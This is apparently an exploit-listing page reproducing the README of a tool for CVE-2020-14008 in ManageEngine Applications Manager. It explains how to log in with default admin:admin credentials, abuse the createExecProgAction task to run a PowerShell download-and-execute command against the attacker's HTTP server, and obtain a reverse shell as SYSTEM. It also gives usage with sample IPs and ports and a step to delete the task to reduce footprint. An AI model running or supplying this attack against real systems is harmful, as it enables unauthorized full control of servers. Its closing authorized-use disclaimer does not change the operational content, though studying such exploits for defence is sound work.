Back Sploitus Exploit for Unrestricted Upload of File with Dangerous Type in Zohocorp Manageengine_Applications_Manager
An improved, more reliable exploit for **CVE-2020-14008** (Remote Code Execution in
ManageEngine Applications Manager, affected versions up to **14720**).
This tool chains an authenticated command-execution primitive
(`createExecProgAction`) with the well-known admin access to the Applications
Manager console, and executes a PowerShell payload fetched from the attacker's
HTTP server — bypassing the fragile JAR/classloader chain used by the original
The original PoC (Exploit-DB 48793) relies on a fragile chain:
1. Upload a malicious `weblogic.jar` via `Upload.do` (directory traversal)
2. Create and execute a task to `move` the JAR into `classes\weblogic\version8\`
3. Trigger a Weblogic credential test that loads the planted Java class
(`weblogic.jndi.Environment` → `setProviderUrl()` → reverse shell)
In practice, step 1 often **fails silently** on real targets: the upload
response never confirms success, the move task then "executes successfully"
without the file existing, the credential test loads the *legitimate* Weblogic
class instead, and no shell ever arrives — with no error at any step.
This tool skips that entire chain. It uses the same `createExecProgAction`
primitive directly to run an arbitrary command as the Applications Manager
service account (typically `NT AUTHORITY\SYSTEM`), delivering the payload via
`IEX(New-Object Net.WebClient).DownloadString(...)`.
- Parameterized: target IP, callback IP, and ports are all command-line arguments
- Auto-generates `shell.ps1` matching the chosen callback host/port
- Cleans up the created task after execution (including on timeouts)
- Interactive PowerShell reverse shell as `SYSTEM`
- Admin credentials for Applications Manager (see [Default Credentials](#default-credentials);
ManageEngine Applications Manager deployments frequently ship with (or are
left with) these default credentials — the exploit requires a working admin
> The script currently authenticates as `admin:admin`. If your target uses a
> different credential pair from the table above, edit the call to
> `get_valid_cookie()` in `main()` inside `am_rce_cmd.py`.
- An HTTP server to serve the generated payload, e.g.
python3 am_rce_cmd.py [am_port] [http_port]
| `target_ip` | Applications Manager host | — |
| `my_ip` | Your (attacker) IP reachable by the target | — |
| `rev_port` | Port for the reverse shell callback | — |
| `am_port` | Applications Manager HTTPS port | `8443` |
| `http_port` | Port of your HTTP server hosting `shell.ps1` | `8000` |
# Terminal 2 — payload HTTP server (run from the repo directory that
python3 am_rce_cmd.py 192.168.113.95 192.168.45.224 1337
1. Retrieve initial session cookies and obtain a valid admin session
2. Discover the Applications Manager base installation directory
3. Generate `shell.ps1` with the chosen callback host/port
4. Create an "Execute Program Action" task whose command is a short
`powershell ... DownloadString('
5. Execute the task — the target fetches the payload and connects back
6. Delete the created task to reduce footprint
| `am_rce_cmd.py` | This tool — direct command-execution exploit (this repo) |
| `cve-2020-14008.py` | Original PoC by Hodorsec (Exploit-DB 48793), kept for reference |
- Original PoC: [Hodorsec]( —
[Exploit-DB 48793](
This tool reuses helper functions from the original script and would not
- **Exploit-DB 48793** — Hodorsec, "ManageEngine Applications Manager 14700 -
Remote Code Execution (Authenticated)", published 2020-09-07:
- **Vendor** — ManageEngine Applications Manager:
- **Public PoC mirrors on GitHub** (independent repositories hosting the
This tool is provided for **educational purposes and authorized security
testing only**. It is intended for use in lab environments, capture-the-flag
exercises, and engagements where you have **explicit, prior written
- Do **not** use this tool on systems you do not own or do not have explicit
- Unauthorized access to computer systems is **illegal** under applicable law
(including, but not limited to, the U.S. Computer Fraud and Abuse Act,
the U.K. Computer Misuse Act, and Indonesia's UU ITE).
- The author assumes **no liability** and is **not responsible** for any
misuse, damage, or legal consequences caused by this tool.
- By using this tool, you accept full responsibility for your own actions and
agree to use it only in a lawful and ethical manner.
The full story
This article is one source in a clustered incident — the cluster page carries the summary, timeline and every other outlet covering it.
